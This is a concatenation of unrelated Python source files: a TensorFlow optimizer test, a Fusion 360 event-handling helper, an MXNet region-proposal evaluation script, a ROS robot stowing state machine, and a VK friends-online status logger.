        self.assertAllClose(1 - (0.9 + 1.3) / 2 * 2.0, sessions[1].run(var_1_g_1))
        # Worker 1 finished later and its gradients will now be dropped as it is
        # stale.
        sessions[1].run(train_ops[1])
        # As shown in the previous test, the local_step for all workers should be
        # still 0 so their next computation will also be dropped.
        sessions[0].run(train_ops[0])
        sessions[1].run(train_ops[1])
        sessions[2].run(train_ops[2])
        # Although the global step should still be 1 as explained above, the local
        # step should now be updated to 1. Just check worker 1 as an example.
        self.assertAllEqual(1, sessions[1].run(global_step))
        self.assertAllEqual(1, sessions[1].run(local_step_1))
        thread_0 = self.checkedThread(
            target=self._run, args=(train_ops[0], sessions[0]))
        thread_1 = self.checkedThread(
            target=self._run, args=(train_ops[1], sessions[1]))
        # Lets worker 0 execute first.
        # It will wait as we need 2 workers to finish this step and the global step
        # should be still 1.
        thread_0.start()
        self.assertAllEqual(1, sessions[1].run(global_step))
        # Starts worker 1.
        thread_1.start()
        thread_1.join()
        thread_0.join()
        # The global step should now be 2 and the gradients should have been
        # applied again.
        self.assertAllEqual(2, sessions[1].run(global_step))
        self.assertAllClose(-0.6 - (0.1 + 0.3) / 2 * 2.0,
                            sessions[1].run(var_0_g_1))
        self.assertAllClose(-1.2 - (0.9 + 1.1) / 2 * 2.0,
                            sessions[1].run(var_1_g_1))
class SyncReplicasOptimizerHookTest(test.TestCase):
    """Tests for the session-run hook produced by make_session_run_hook."""

    def testErrorIfUsedBeforeMinimizeCalled(self):
        """The hook must refuse to begin() before gradients were applied."""
        opt = training.SyncReplicasOptimizer(
            opt=gradient_descent.GradientDescentOptimizer(1.0),
            replicas_to_aggregate=1,
            total_num_replicas=1)
        hook = opt.make_session_run_hook(True)
        with self.assertRaisesRegexp(ValueError,
                                     "apply_gradient should be called"):
            hook.begin()

    def testCanCreatedBeforeMinimizeCalled(self):
        """This behavior is required to be integrated with Estimators."""
        # Creating the hook first and calling minimize afterwards must work.
        opt = training.SyncReplicasOptimizer(
            opt=gradient_descent.GradientDescentOptimizer(1.0),
            replicas_to_aggregate=1,
            total_num_replicas=1)
        hook = opt.make_session_run_hook(True)
        v = variables.Variable([0.])
        global_step = variables.Variable(0, name="global_step", trainable=False)
        opt.minimize(v, global_step=global_step)
        hook.begin()
# Run the test suite when this file is executed directly.
if __name__ == "__main__":
    test.main()
|
events.py | # Event managing.
#
# Allows catching events with functions instead of classes.
# Tracks registered events and allows clean-up with one function call.
# All event callbacks are also wrapped in an error.ErrorCatcher().
#
# This file is part of thomasa88lib, a library of useful Fusion 360
# add-in/script functions.
#
# Copyright (c) 2020 Thomas Axelsson, ZXYNINE
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import adsk.core, adsk.fusion, adsk.cam
import sys, time
import threading
from typing import List, Tuple
# Avoid Fusion namespace pollution
from . import error, utils
# Try to resolve base class automatically
AUTO_HANDLER_CLASS = None
class EventsManager:
    """Registers Fusion 360 event handlers and custom events, and tears them
    all down with a single clean_up() call.

    Every callback is wrapped in an error.ErrorCatcher() so exceptions are
    reported instead of silently lost inside Fusion's event dispatch.
    """
    def __init__(self, error_catcher=None):
        #Declared in init to allow multiple commands to use a single lib
        # Bugfix: typing.Tuple must be subscripted with []. The previous
        # Tuple(type, ...) *called* Tuple, which raises TypeError when this
        # annotation is evaluated at runtime.
        self.handlers: List[Tuple[type, adsk.core.CommandEvent]] = []
        self.custom_event_names = []
        self.app, self.ui = utils.AppObjects()
        self.next_delay_id = 0
        self.delayed_funcs = {}
        self.delayed_event = None
        self.delayed_event_id = utils.get_caller_path() + '_delay_event'
        self.error_catcher = error_catcher if error_catcher is not None else error.ErrorCatcher()

    #Assigning
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def add_handler(self, event:adsk.core.CommandEvent, base_class=AUTO_HANDLER_CLASS, callback=None):
        """Attach *callback* to *event*, returning the (handler, event) info.

        `AUTO_HANDLER_CLASS` results in:
        1: Getting the classType
        2: Adding 'Handler' to the end and Splitting at '::'
        3: Getting the module using the first segment
        4: sets baseClass to the return of getattr using the base and all subsequent segments
        """
        if base_class == AUTO_HANDLER_CLASS:
            handler_classType_name :str = event.classType() + 'Handler'
            handler_class_parts = handler_classType_name.split('::')
            base_class = sys.modules[handler_class_parts.pop(0)]
            for cls in handler_class_parts: base_class = getattr(base_class, cls)
        # Build a one-off handler subclass whose notify() is the wrapped callback.
        handler_name = base_class.__name__ + '_' + callback.__name__
        handler_class = type(handler_name, (base_class,), {"notify": error._error_catcher_wrapper(self, callback)})
        handler_class.__init__ = lambda self: super(handler_class, self).__init__()
        handler = handler_class()
        result = event.add(handler)
        if not result: raise Exception('Failed to add handler ' + callback.__name__)
        handler_info = (handler, event)
        self.handlers.append(handler_info)# Avoid garbage collection
        return handler_info

    def register_event(self, name):
        """Register a custom event by *name*, tracking it for later clean-up."""
        # Clears and then starts the event (makes sure there is not an old event registered due to a bad stop)
        self.app.unregisterCustomEvent(name)
        event:adsk.core.Event = self.app.registerCustomEvent(name)
        if event: self.custom_event_names.append(name)
        return event

    def find_handler_by_event(self, findevent:adsk.core.Event):
        """Return the registered handler whose event name matches, else None."""
        eventName = findevent.name
        for handler, event in self.handlers:
            if eventName == event.name:
                return handler

    #Timing
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def delay(self, func, secs=0):
        '''Puts a function at the end of the event queue, and optionally delays it. '''
        if self.delayed_event is None:# Register the event. Will be removed when user runs clean_up()
            self.delayed_event = self.register_event(self.delayed_event_id)
            self.add_handler(self.delayed_event, callback=self._delayed_event_handler)
        delay_id = self.next_delay_id
        self.next_delay_id += 1
        def waiter():
            time.sleep(secs)
            self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
        self.delayed_funcs[delay_id] = func
        if secs > 0:
            thread = threading.Thread(target=waiter)
            # Bugfix: assigning to `isDaemon` only shadowed the old method and
            # never daemonized the thread; set the `daemon` attribute so the
            # waiter cannot keep the process alive at shutdown.
            thread.daemon = True
            thread.start()
        else: self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))

    def _delayed_event_handler(self, args: adsk.core.CustomEventArgs):
        """Custom-event callback: run the function queued under the fired id."""
        delay_id = int(args.additionalInfo)
        func = self.delayed_funcs.pop(delay_id, None)
        # Robustness: the id may be unknown or already consumed; the previous
        # unconditional call would raise TypeError on None.
        if func is not None:
            func()

    #Removing
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    def remove_handler(self, handler_info):
        """Detach one (handler, event) pair and stop tracking it."""
        handler, event = handler_info
        self.handlers.remove(handler_info)
        event.remove(handler)
        return None # Let user assign their handle with the return value

    def remove_handler_by_event(self, event: adsk.core.CommandEvent):
        """Find the handler attached to *event* and remove it."""
        handler = self.find_handler_by_event(event)
        self.remove_handler((handler, event))

    def remove_all_handlers(self):
        """Detach every tracked handler, ignoring individual removal errors."""
        for handler, event in self.handlers:
            with utils.Ignore():event.remove(handler)
        self.handlers.clear()

    def unregister_all_events(self):
        """Unregister every custom event this manager registered."""
        for event_name in self.custom_event_names:
            self.app.unregisterCustomEvent(event_name)
        self.custom_event_names.clear()

    def clean_up(self, oldControl = None):
        """`oldControl` is an optional variable that, if/when provided, the function: \\
        `utils.clear_ui_items(oldControl)` is called, which attempts to remove the control after cleanup"""
        self.remove_all_handlers()
        self.unregister_all_events()
        if oldControl is not None: utils.clear_ui_items(oldControl)
|
rpn_test.py | import argparse
import importlib
import math
import os
import pickle as pkl
from functools import reduce
from queue import Queue
from threading import Thread
from core.detection_module import DetModule
from core.detection_input import Loader
from utils.load_model import load_checkpoint
from utils.patch_config import patch_config_as_nothrow
import mxnet as mx
import numpy as np
def parse_args():
    """Parse the command line and import the experiment config module.

    The --config value is a file path such as ``config/foo.py``; it is turned
    into a dotted module path and imported, and the module object is returned.
    """
    arg_parser = argparse.ArgumentParser(description='Test Detection')
    # general
    arg_parser.add_argument('--config', help='config file path', type=str)
    parsed = arg_parser.parse_args()
    module_path = parsed.config.replace('.py', '').replace('/', '.')
    return importlib.import_module(module_path)
# Evaluation driver: runs the RPN test symbol over the dataset in splits,
# collects proposals via worker threads, and scores them with COCO eval.
if __name__ == "__main__":
    # Disable cuDNN autotune for stable start-up behavior.
    os.environ["MXNET_CUDNN_AUTOTUNE_DEFAULT"] = "0"

    config = parse_args()

    # Unpack the experiment configuration objects; patch_config_as_nothrow
    # makes absent attributes read as None instead of raising.
    pGen, pKv, pRpn, pRoi, pBbox, pDataset, pModel, pOpt, pTest, \
    transform, data_name, label_name, metric_list = config.get_config(is_train=False)
    pGen = patch_config_as_nothrow(pGen)
    pKv = patch_config_as_nothrow(pKv)
    pRpn = patch_config_as_nothrow(pRpn)
    pRoi = patch_config_as_nothrow(pRoi)
    pBbox = patch_config_as_nothrow(pBbox)
    pDataset = patch_config_as_nothrow(pDataset)
    pModel = patch_config_as_nothrow(pModel)
    pOpt = patch_config_as_nothrow(pOpt)
    pTest = patch_config_as_nothrow(pTest)

    sym = pModel.rpn_test_symbol
    sym.save(pTest.model.prefix + "_rpn_test.json")

    # Load and concatenate the cached roidbs for every image set.
    image_sets = pDataset.image_set
    roidbs_all = [pkl.load(open("data/cache/{}.roidb".format(i), "rb"), encoding="latin1") for i in image_sets]
    roidbs_all = reduce(lambda x, y: x + y, roidbs_all)

    from pycocotools.coco import COCO
    from pycocotools.cocoeval import COCOeval
    from utils.roidb_to_coco import roidb_to_coco
    # Ground truth: real annotation file if configured, else synthesized from roidb.
    if pTest.coco.annotation is not None:
        coco = COCO(pTest.coco.annotation)
    else:
        coco = roidb_to_coco(roidbs_all)

    data_queue = Queue(100)
    result_queue = Queue()
    execs = []      # one DetModule per GPU, created on the first split
    workers = []    # forward-pass threads, also created on the first split
    coco_result = []
    # Process the roidb in fixed-size splits to bound memory use.
    split_size = 1000
    for index_split in range(int(math.ceil(len(roidbs_all) / split_size))):
        print("evaluating [%d, %d)" % (index_split * split_size, (index_split + 1) * split_size))
        roidb = roidbs_all[index_split * split_size:(index_split + 1) * split_size]
        roidb = pTest.process_roidb(roidb)
        for i, x in enumerate(roidb):
            # NOTE(review): float32 has 24 bits of mantissa; see TODO below
            # about id/rec_id overflow for very large datasets.
            x["rec_id"] = np.array(i, dtype=np.float32)
            x["im_id"] = np.array(x["im_id"], dtype=np.float32)

        loader = Loader(roidb=roidb,
                        transform=transform,
                        data_name=data_name,
                        label_name=label_name,
                        batch_size=1,
                        shuffle=False,
                        num_worker=4,
                        num_collector=2,
                        worker_queue_depth=2,
                        collector_queue_depth=2,
                        kv=None)
        print("total number of images: {}".format(loader.total_record))

        data_names = [k[0] for k in loader.provide_data]

        # One-time model setup on the first split: load weights, fold BN, and
        # bind one executor per configured GPU.
        if index_split == 0:
            arg_params, aux_params = load_checkpoint(pTest.model.prefix, pTest.model.epoch)
            if pModel.process_weight is not None:
                pModel.process_weight(sym, arg_params, aux_params)
            # merge batch normalization
            from utils.graph_optimize import merge_bn
            sym, arg_params, aux_params = merge_bn(sym, arg_params, aux_params)
            for i in pKv.gpus:
                ctx = mx.gpu(i)
                mod = DetModule(sym, data_names=data_names, context=ctx)
                mod.bind(data_shapes=loader.provide_data, for_training=False)
                mod.set_params(arg_params, aux_params, allow_extra=False)
                execs.append(mod)

        all_outputs = []

        # One-time worker threads: each pulls batches, runs a forward pass on
        # its executor, and pushes numpy outputs to result_queue.
        if index_split == 0:
            def eval_worker(exe, data_queue, result_queue):
                while True:
                    batch = data_queue.get()
                    exe.forward(batch, is_train=False)
                    out = [x.asnumpy() for x in exe.get_outputs()]
                    result_queue.put(out)
            for exe in execs:
                workers.append(Thread(target=eval_worker, args=(exe, data_queue, result_queue)))
            for w in workers:
                w.daemon = True
                w.start()

        import time
        t1_s = time.time()

        # Feed this split's batches from a separate thread so collection below
        # can proceed concurrently.
        def data_enqueue(loader, data_queue):
            for batch in loader:
                data_queue.put(batch)
        enqueue_worker = Thread(target=data_enqueue, args=(loader, data_queue))
        enqueue_worker.daemon = True
        enqueue_worker.start()

        # Collect exactly one result per record in this split.
        for _ in range(loader.total_record):
            r = result_queue.get()
            rid, id, info, box, score = r
            rid, id, info, box, score = rid.squeeze(), id.squeeze(), info.squeeze(), box.squeeze(), score.squeeze()
            # TODO: POTENTIAL BUG, id or rid overflows float32(int23, 16.7M)
            id = np.asscalar(id)
            rid = np.asscalar(rid)
            scale = info[2]  # h_raw, w_raw, scale
            box = box / scale  # scale to original image scale
            output_record = dict(
                rec_id=rid,
                im_id=id,
                im_info=info,
                bbox_xyxy=box,   # ndarray (n, class * 4) or (n, 4)
                cls_score=score  # ndarray (n, class)
            )
            all_outputs.append(output_record)
        t2_s = time.time()
        print("network uses: %.1f" % (t2_s - t1_s))

        # let user process all_outputs
        if pTest.process_rpn_output is not None:
            if callable(pTest.process_rpn_output):
                pTest.process_rpn_output = [pTest.process_rpn_output]
            for callback in pTest.process_rpn_output:
                all_outputs = callback(all_outputs, roidb)

        # aggregate results for ensemble and multi-scale test
        output_dict = {}
        for rec in all_outputs:
            im_id = rec["im_id"]
            if im_id not in output_dict:
                output_dict[im_id] = dict(
                    bbox_xyxy=[rec["bbox_xyxy"]],
                    cls_score=[rec["cls_score"]]
                )
            else:
                output_dict[im_id]["bbox_xyxy"].append(rec["bbox_xyxy"])
                output_dict[im_id]["cls_score"].append(rec["cls_score"])
        for k in output_dict:
            if len(output_dict[k]["bbox_xyxy"]) > 1:
                output_dict[k]["bbox_xyxy"] = np.concatenate(output_dict[k]["bbox_xyxy"])
            else:
                output_dict[k]["bbox_xyxy"] = output_dict[k]["bbox_xyxy"][0]
            if len(output_dict[k]["cls_score"]) > 1:
                output_dict[k]["cls_score"] = np.concatenate(output_dict[k]["cls_score"])
            else:
                output_dict[k]["cls_score"] = output_dict[k]["cls_score"][0]
        t3_s = time.time()
        print("aggregate uses: %.1f" % (t3_s - t2_s))

        # Convert per-image detections to COCO xywh records; keep only each
        # image's 100 highest-scoring proposals.
        for iid in output_dict:
            result = []
            det = output_dict[iid]["bbox_xyxy"]
            if det.shape[0] == 0:
                continue
            scores = output_dict[iid]["cls_score"]
            xs = det[:, 0]
            ys = det[:, 1]
            ws = det[:, 2] - xs + 1
            hs = det[:, 3] - ys + 1
            result += [
                {'image_id': int(iid),
                 'category_id': 1,
                 'bbox': [float(xs[k]), float(ys[k]), float(ws[k]), float(hs[k])],
                 'score': float(scores[k])}
                for k in range(det.shape[0])
            ]
            result = sorted(result, key=lambda x: x['score'])[-100:]
            coco_result += result
        t5_s = time.time()
        print("convert to coco format uses: %.1f" % (t5_s - t3_s))

    # Dump all proposals and run class-agnostic COCO bbox evaluation.
    import json
    json.dump(coco_result,
              open("experiments/{}/{}_proposal_result.json".format(pGen.name, pDataset.image_set[0]), "w"),
              sort_keys=True, indent=2)

    coco_dt = coco.loadRes(coco_result)
    coco_eval = COCOeval(coco, coco_dt)
    coco_eval.params.iouType = "bbox"
    coco_eval.params.maxDets = [1, 10, 100]  # [100, 300, 1000]
    coco_eval.params.useCats = False
    coco_eval.evaluate()
    coco_eval.accumulate()
    coco_eval.summarize()
    t6_s = time.time()
    print("coco eval uses: %.1f" % (t6_s - t5_s))
|
stowing_task_smach.py | #! /usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
import threading
# from findObject2DState import FindObject2DState
from detectObjectState import DetectObjectState
from moveRobotState import MoveRobotState
from moveRobotToNamedPose import MoveRobotToNamedPose
from moveRobotToRelativePose import MoveRobotToRelativePose
from decideNextPickItemState import DecideNextPickItemState
from popItemState import PopItemState
from stowSuccessfulState import StowSuccessfulState
from getBinCoordinatesState import GetBinCoordinatesState
from publisherState import PublisherState
from decideGraspPoseStateFromPointCloud import DecideGraspPoseStateFromPointCloud
from decideGraspPoseState import DecideGraspPoseState
from graspObjectState import GraspObjectState
from updateCollisionState import UpdateCollisionState
from toggleBinFillersAndTote import ToggleBinFillersAndTote
from suctionState import SuctionState
import waitState
from geometry_msgs.msg import Pose, Point, Quaternion
from baxter_core_msgs.msg import EndEffectorCommand
# =============================================================================
# Documentation fields in the user_data of the state machine:
# next_item_to_pick : {'bin': a string encoding from which bin to pick, 'item': a string with the item name}
# goal_frame_id : a string with the TF frame of where to move the arm, used by MoveRobotState
# goal_pose : a 3D pose in the goal_frame_id frame, describing where to move the arm, used by MoveRobotState
# =============================================================================
# =============================================================================
# =============================================================================
if __name__ == '__main__':
    # Entry point: build and run the SMACH state machine for the "stow"
    # task (pick items out of the tote and place them into shelf bins).
    rospy.init_node('smach_shelf_reach_testing')

    # Create the top level SMACH state machine
    sm = smach.StateMachine(outcomes=['succeeded', 'aborted', 'preempted'])

    # Distance used by the relative-motion states to push the sucker into
    # the target bin and to retract it again afterwards.
    # NOTE(review): presumably metres along the /shelf frame z axis — confirm
    # against MoveRobotToRelativePose.
    relative_movement = 0.33

    # create states and connect them
    with sm:
        # decide which object to grasp next from which bin
        sm.add('get_next_item', DecideNextPickItemState(),
               transitions={'succeeded':'set_the_shelf_collision_scene', 'finished': 'succeeded'})
               # transitions={'succeeded':'add_object_collision', 'finished': 'succeeded'})

        # fill the shelf bins in the planning scene so motion planning
        # treats them as obstacles
        sm.add('set_the_shelf_collision_scene', ToggleBinFillersAndTote(action='fill_bins'),
               transitions={'succeeded':'set_the_tote_collision_scene',
                            'failed': 'abort_state'})

        # add tote and tote pillar to collision scene
        # tote/pillar actions: tote_on, tote_off, pillar_on, pillar_off, all_on, all_off
        sm.add('set_the_tote_collision_scene', ToggleBinFillersAndTote(action='all_on'),
               transitions={'succeeded':'move_to_tote',
                            'failed': 'abort_state'})

        # move your hand above the tote to look into it
        sm.add('move_to_tote', MoveRobotToNamedPose(movegroup='left_arm',
                                                    goal_pose_name='look_into_tote'),
               # transitions={'succeeded':'move_arm_to_object',
               transitions={'succeeded':'detect_object',
                            'failed': 'abort_state'})

        # run object detection; loops back onto itself until an object is
        # detected with sufficient confidence
        sm.add('detect_object', DetectObjectState(),
               transitions={'no_objects':'detect_object',
                            'succeeded':'turn_tote_collision_off',
                            'confidence_too_low':'detect_object'})  # TODO add number of trials for the same object
               # 'succeeded':'move_arm_infront_of_object'})

        # remove the tote from the collision scene so the arm may reach in
        sm.add('turn_tote_collision_off', ToggleBinFillersAndTote(action='tote_off'),
               transitions={'succeeded':'decide_grasp_pose',
                            'failed': 'abort_state'})

        # perform PCL segmentation and pick a good object / point to grasp;
        # retries itself on failure
        sm.add('decide_grasp_pose', DecideGraspPoseStateFromPointCloud(),
               transitions={'succeeded':'move_arm_to_object', 'failed':'decide_grasp_pose'})

        # move to object tf and grasp (suction) the object
        sm.add('move_arm_to_object', GraspObjectState(movegroup='left_arm', velocity_scale=0.5),
               transitions={'succeeded':'lift_object_up',
                            'failed':'deactivate_suction_and_abort',  # Infinite loop, state must say aborted. Don't think this happens yet
                            'aborted':'deactivate_suction_and_abort'})

        # Lift up the object
        # move your hand back out of the tote
        sm.add('lift_object_up', MoveRobotToNamedPose(movegroup='left_arm',
                                                      goal_pose_name='left_tote'),
               transitions={'succeeded':'add_object_collision',
               # transitions={'succeeded':'get_target_bin_coordinates',
                            'failed': 'abort_state'})

        # attach the held object to the arm in the collision scene
        sm.add('add_object_collision', UpdateCollisionState(action='attach'),
               transitions={'succeeded':'get_target_bin_coordinates'})

        # calculate which bin the object has to go to
        sm.add('get_target_bin_coordinates', GetBinCoordinatesState(),
               transitions={'succeeded':'move_arm_to_bin','aborted':'abort_state'})

        # move the sucker into the object, colliding with it slightly
        # still problems with the planner in here
        # move arm in front of bin before looking for the object
        sm.add('move_arm_to_bin', MoveRobotState(movegroup='left_arm'),
               transitions={'succeeded':'turn_off_the_shelf_collision_scene', 'failed':'abort_state'})

        # clear the bin fillers so the sucker can enter the bin
        sm.add('turn_off_the_shelf_collision_scene', ToggleBinFillersAndTote(action='unfill_bins'),
               transitions={'succeeded':'move_sucker_in',
                            'failed': 'abort_state'})

        # TODO probably would need to look into the bin to see where in the bin there is space :)
        # move the object into the shelf bin
        sm.add('move_sucker_in', MoveRobotToRelativePose(movegroup='left_arm',
                                                         pose_frame_id='/shelf',
                                                         # TODO fix that based on the position we are at!
                                                         relative_pose=Pose(position=Point(0,0,relative_movement),
                                                                            orientation=Quaternion(0,0,0,1)),
                                                         velocity_scale=0.5),
               transitions={'succeeded':'deactivate_suction',
                            'failed':'abort_state'})

        # deactivate suction to let go of the object
        sm.add('deactivate_suction', SuctionState(state='off', movegroup=None),
               transitions={'succeeded':'remove_object_collision', 'failed':'abort_state'})

        # detach the (now released) object from the arm in the collision scene
        sm.add('remove_object_collision', UpdateCollisionState(action='detach'),
               transitions={'succeeded':'move_sucker_back_out'})

        # sm.add('remove_current_pick', PopItemState(),
        #        transitions={'succeeded':'move_to_neutral'})

        # retract the sucker out of the bin, then loop back for the next item
        sm.add('move_sucker_back_out', MoveRobotToRelativePose(
                                           movegroup='left_arm',
                                           pose_frame_id='/shelf',
                                           relative_pose=Pose(position=Point(0,0,-relative_movement),
                                                              orientation=Quaternion(0,0,0,1)),
                                           velocity_scale=0.5),
               transitions={'succeeded':'get_next_item',
                            'failed':'abort_state'})

        # something went wrong after we had the suction on (maybe
        # there should be a field for this in user_data
        # e.g. suction_status = 'on' or 'off' which should be checked)
        # Publishes a raw "stop" end-effector command a few times, then aborts.
        sm.add('deactivate_suction_and_abort',
               PublisherState(topic='/robot/end_effector/right_gripper/command',
                              datatype=EndEffectorCommand,
                              data={'command':'stop', 'sender':'user', 'id': 65537},
                              n=5, hz=10),
               transitions={'succeeded':'abort_state'})

        # drop the current pick from the work queue and end the state machine
        sm.add('abort_state', PopItemState(),
               transitions={'succeeded':'succeeded'})

        # sm.add('move_to_neutral', MoveRobotState(movegroup='left_arm',
        #        named=True, goal_frame_id='left_neutral'),
        #        transitions={'succeeded':'decide_next_pick',
        #                     'failed': 'abort_state'})

    # run the state machine
    # We start it in a separate thread so we can cleanly shut it down via CTRL-C
    # by requesting preemption.
    # The state machine normally runs until a terminal state is reached.
    smach_thread = threading.Thread(target=sm.execute)
    smach_thread.start()
    # sm.execute()

    # Wait for ctrl-c to stop the application
    rospy.spin()

    # request the state machine to preempt and wait for the SM thread to finish
    sm.request_preempt()
    smach_thread.join()

    # stop the introspection server
    #sis.stop()
|
VKFriendOnlineWatcher.py | from datetime import datetime
import threading, time
from vk_api.longpoll import VkLongPoll, VkEventType, VkLongpollMode
import vk_api
import signal
import time
import sys
import os
from modules import db_sqlite as db
from modules import pushgateway_tools as pgt
from modules import fs_tools
import confloader
class Main(object):
    """Watch the online/offline status of VK friends (plus extra user ids
    listed in a file), record state transitions into a local SQLite DB and
    optionally push per-user metrics to a Prometheus pushgateway.

    Two worker threads exist: ``dop_thread`` polls the VK API roughly once a
    minute, and ``loop_thread`` (only when ``USE_LONGPOLL`` is enabled)
    listens to VK longpoll online/offline events.
    """

    def __init__(self):
        self.CONFIG = confloader.VKFOConfig()
        # Authenticate once; all API calls go through self.vkapi afterwards.
        self.vk_session = vk_api.VkApi(login=self.CONFIG.VK_LOGIN, password=self.CONFIG.VK_PASSWORD)
        self.vk_session.auth(token_only=True)
        self.vkapi = self.vk_session.get_api()
        self.VK_USER_IDS = []   # user ids already seen/registered in the DB
        self.DOP_USER_IDS = []  # extra ("dop") user ids read from USERS_FILE
        self.dop_thread = threading.Thread(target=self.UpdateDopUsers)
        self.loop_thread = threading.Thread(target=self._loop)
        self.USE_LONGPOLL = False  # polling mode by default; longpoll is opt-in
        self.is_running = False
        if self.CONFIG.PROMETHEUS_SEND:
            self.pgt_sender = pgt.PushgatewaySender(self.CONFIG.PROMETHEUS_HOST)
        if self.CONFIG.HAS_UPSER_FILE:
            self.DOP_USER_IDS = fs_tools.GetIdList(self.CONFIG.USERS_FILE)
        # Allow a clean shutdown on Ctrl-C / SIGTERM.
        signal.signal(signal.SIGINT, self._handleExit)
        signal.signal(signal.SIGTERM, self._handleExit)

    def Start(self):
        """Start the polling thread (and the longpoll thread when enabled)."""
        self.is_running = True
        self.dop_thread.start()
        if self.USE_LONGPOLL:
            self.longpoll = VkLongPoll(self.vk_session)
            self.loop_thread.start()

    def Stop(self):
        """Ask both worker loops to stop; they exit on their next check."""
        self.is_running = False

    def Wait(self):
        """Block until the worker threads have finished."""
        self.dop_thread.join()
        if self.USE_LONGPOLL:
            self.loop_thread.join()

    def _loop(self):
        """Longpoll worker: record USER_ONLINE / USER_OFFLINE events."""
        conn = db.CreateDB('./sql/init.sql')
        for event in self.longpoll.listen():
            if not self.is_running:
                break
            tags = { 'user': event.user_id, 'full_name': event.full_name, 'platform': event.last_seen }
            if event.type == VkEventType.USER_ONLINE:
                db.InsertOnline(conn, event.user_id, event.timestamp)
                # BUGFIX: pgt_sender only exists when PROMETHEUS_SEND is set
                # (see __init__); guard it like UpdateDopUsers does.
                if self.CONFIG.PROMETHEUS_SEND:
                    self.pgt_sender.AddToPool(self.pgt_sender.GetMetricsStr('friends_online_stats', tags, '1'))
            elif event.type == VkEventType.USER_OFFLINE:
                db.InsertOffline(conn, event.user_id, event.timestamp, event.last_seen)
                if self.CONFIG.PROMETHEUS_SEND:
                    self.pgt_sender.AddToPool(self.pgt_sender.GetMetricsStr('friends_online_stats', tags, '0'))
            if event.user_id not in self.VK_USER_IDS:
                self.VK_USER_IDS.append(event.user_id)
                db.AddNewUser(conn, event.user_id, event.full_name)

    def UpdateDopUsers(self):
        """Polling worker: fetch online status for the extra users (and, when
        longpoll is off, for all friends) about once a minute and persist any
        state changes."""
        conn = db.CreateDB('./sql/init.sql')
        while self.is_running:
            # BUGFIX: the keyword was misspelled 'user_uds', so the extra
            # users from USERS_FILE were silently ignored by the VK API.
            dop_users = self.vkapi.users.get(user_ids=self.DOP_USER_IDS, fields=['online', 'last_seen'])
            if not self.USE_LONGPOLL:
                friends = self.vkapi.friends.get(fields=['online', 'last_seen'])['items']
                dop_users = dop_users + friends
            timestamp = self.GetUnixTimestamp()
            for user in dop_users:
                user_id = int(user['id'])
                full_name = '{} {}'.format(user['first_name'], user['last_name'])
                user_online = int(user['online'])
                # -1 marks "platform unknown" when VK omits last_seen.
                user_last_seen = -1
                if 'last_seen' in user:
                    user_last_seen = int(user['last_seen']['platform'])
                if user_id not in self.VK_USER_IDS:
                    self.VK_USER_IDS.append(user_id)
                    if not db.IsUserExists(conn, user_id):
                        db.AddNewUser(conn, user_id, full_name, False)
                state = db.GetLastState(conn, user_id)
                if state is not None:
                    if self.CONFIG.PROMETHEUS_SEND:
                        tags = { 'user': user_id, 'full_name': full_name, 'platform': user_last_seen }
                        self.pgt_sender.AddToPool(self.pgt_sender.GetMetricsStr('friends_online_stats', tags, str(user_online)))
                    if int(state) == user_online:
                        continue  # no transition since last poll
                if user_online == 0:
                    db.InsertOffline(conn, user_id, timestamp, user_last_seen, False)
                elif user_online == 1:
                    db.InsertOnline(conn, user_id, timestamp, False)
            conn.commit()
            if self.CONFIG.PROMETHEUS_SEND:
                self.pgt_sender.SendFromPool()
            self._waiter()

    def _waiter(self):
        """Sleep ~60 s in 1 s slices so a Stop() request is noticed quickly."""
        UPD_SECONDS = 60
        i = 0
        while self.is_running and i < UPD_SECONDS:
            i = i + 1
            time.sleep(1)

    def _updateDopUsers(self):
        """Re-read the extra user-id list from USERS_FILE.

        BUGFIX: the result was previously discarded; it is now stored in
        self.DOP_USER_IDS. NOTE(review): this method is not called anywhere
        in the visible code — presumably intended for periodic refresh.
        """
        if self.CONFIG.HAS_UPSER_FILE:
            self.DOP_USER_IDS = fs_tools.GetIdList(self.CONFIG.USERS_FILE)

    def GetUnixTimestamp(self):
        """Return the current local time as a Unix timestamp (float seconds)."""
        return datetime.now().timestamp()

    def _handleExit(self, sig, frame):
        """SIGINT/SIGTERM handler: flag both worker loops to stop."""
        self.is_running = False
        print('Stopping')
if __name__ == '__main__':
    # Script entry point: build the watcher, launch its worker threads,
    # and block until they terminate (SIGINT/SIGTERM trigger a clean stop).
    watcher = Main()
    watcher.Start()
    watcher.Wait()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.